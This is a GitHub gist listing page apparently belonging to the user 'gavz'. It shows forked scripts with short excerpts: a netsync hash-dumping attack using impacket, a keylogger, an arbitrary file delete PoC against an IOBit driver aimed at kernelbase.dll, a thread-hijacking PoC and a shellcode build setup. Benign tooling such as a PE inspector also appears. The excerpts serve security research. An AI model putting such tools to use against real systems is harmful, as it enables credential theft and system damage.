gavz
/ ws.cpp
Created
March 17, 2025 22:06
— forked from AndreyBazhan/ws.cpp
Process Explorer: Process Properties->Performance tab performance issue
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <psapi.h> | |
| int main() | |
| { | |
| HANDLE ProcessHandle; | |
| ULONG Processes[4096]; | |
| ULONG DataSize; | |
| ULONG NumberOfProcesses; |
gavz
/ netdumper.py
Created
March 7, 2025 23:37
— forked from ThePirateWhoSmellsOfSunflowers/netdumper.py
This script perform a netsync attack. No SMB involved
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from impacket.dcerpc.v5 import epm, rpcrt, transport, nrpc, samr | |
| from impacket.uuid import bin_to_uuidtup | |
| from impacket.crypto import SamDecryptNTLMHash | |
| from binascii import unhexlify, hexlify | |
| from random import randbytes | |
| import sys | |
| import argparse | |
| # This script perform a netsync attack. No SMB involved | |
| # My first idea was to only use netlogon SSP, however SAMR seems not compatible |
gavz
/ CMakeLists.txt
Created
March 7, 2025 23:20
— forked from MEhrn00/CMakeLists.txt
Building Stardust with CMake
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cmake_minimum_required(VERSION 3.24) | |
| project(Stardust | |
| LANGUAGES CXX | |
| ) | |
| # Build option for generating the final shellcode.bin file | |
| option(STARDUST_BUILD_SHELLCODE "Build the final shellcode.bin file" OFF) | |
| # Add nasm for the Stardust.asm source if building shellcode | |
| if(${STARDUST_BUILD_SHELLCODE}) |
gavz
/ PE-Inspect-PortableExecutable-Namespace.ps1
Last active
March 4, 2025 23:52
— forked from Dump-GUY/PE-Inspect-PortableExecutable-Namespace.ps1
PowerShell (pwsh): PE-Inspect-PortableExecutable-Namespace
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Expand-Properties($Object, $Depth = 5, $Indent = 0) { | |
| if ($Depth -le 0 -or $null -eq $Object) { return } $prefix = " " * $Indent | |
| $Object | gm -m Property | % { | |
| $pValue = $Object.$($_.Name) | |
| if ($pValue -is [Enum]) { Write-Host "$prefix$($_.Name): " -F Green -N; Write-Host "$pValue" -F Blue } | |
| elseif ($null -eq $pValue) { Write-Host "$prefix$($_.Name): " -F Green -N; Write-Host "(null)" -F Blue } | |
| elseif ($pValue -is [Collections.IEnumerable] -and $pValue -isnot [string]) { Write-Host "$prefix$($_.Name): " -F Green; $pValue | % { Expand-Properties $_ ($Depth - 1) ($Indent + 4) } } | |
| elseif ($pValue -is [PSObject] -or $pValue.GetType().Namespace -match "^System.Reflection") { Write-Host "$prefix$($_.Name): " -F Green; Expand-Properties $pValue ($Depth - 1) ($Indent + 4) } | |
| else { Write-Host "$prefix$($_.Name): " -F Green -N; Write-Host "$pValue" -F Blue }}} | |
| Expand-Properties ([Reflection.PortableExecutable.PEReader]::new([IO.File]::OpenRead([IO.Path]::G |
gavz
/ tls-keylogger.ps1
Created
February 11, 2025 23:09
— forked from jborean93/tls-keylogger.ps1
Logs Wireshark compatible TLS keys like the SSLKEYLOGFILE env var
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Requires -Module PSDetour | |
| [CmdletBinding()] | |
| param ( | |
| [Parameter(Mandatory)] | |
| [string] | |
| $LogPath | |
| ) | |
| $LogPath = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($LogPath) |
gavz
/ lsarlookupsids3_aes.py
Created
February 7, 2025 19:46
— forked from ThePirateWhoSmellsOfSunflowers/lsarlookupsids3_aes.py
Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3) (AES version)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc | |
| from impacket.uuid import bin_to_uuidtup | |
| from binascii import unhexlify | |
| from random import randbytes | |
| import sys | |
| # Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3) | |
| # Pure TCP RPC is used (ncacn_ip_tcp option) | |
| # AES is used, so you need impacket #1848 (https://github.com/fortra/impacket/pull/1848) | |
| # Tested with impacket 0.12.0 on GOAD |
gavz
/ symcache.ps1
Created
January 17, 2025 21:26
— forked from daaximus/symcache.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # probably exists in a better form; but script is useful for caching OS modules based on major OS version/build and file | |
| # hash. intended to make life easier, ymmv. | |
| # | |
| # .\symcache.ps1 -src "C:\Windows\System32\drivers" -dst "X:\Windows\drivers" | |
| # ^^ This will copy and organize the bins in the subdirectory and recurse through all subdirectories, and then download | |
| # the symbols if they are available. | |
| # | |
| # - daax | |
| param( |
gavz
/ keylogger.cpp
Created
January 16, 2025 21:56
— forked from x86matthew/keylogger.cpp
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <windows.h> | |
| #pragma comment(lib, "winmm.lib") | |
| void Nothing(WORD wKey) | |
| { | |
| } | |
| void PrintKey(WORD wKey) |
gavz
/ IOBitStillSucks.cpp
Created
January 7, 2025 18:36
— forked from alfarom256/IOBitStillSucks.cpp
Arbitrary File Delete in IOBit Malware Fighter "Pro"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <stdio.h> | |
| const wchar_t* wstrDummyFile = LR"(\??\C:\Windows\System32\kernelbase.dll)"; | |
| const char* strDeviceName = R"(\\.\IMFForceDelete123)"; | |
| int main() { | |
| DWORD dwReturnVal = 0; | |
| DWORD dwBytesReturned = 0; | |
| BOOL bRes = FALSE; |
gavz
/ TROPH.c
Created
December 30, 2024 20:59
— forked from UmaRex01/TROPH.c
Thread Hijacking without executable memory allocation PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Thread Hijacking without executable memory allocation PoC | |
| * | |
| * @UmaRex01 | |
| * https://medium.com/@umarex01/t-rop-h-thread-hijacking-without-executable-memory-allocation-d746c102a9ca | |
| */ | |
| #include <windows.h> | |
| #include <tlhelp32.h> | |
| #include <tchar.h> |
NewerOlder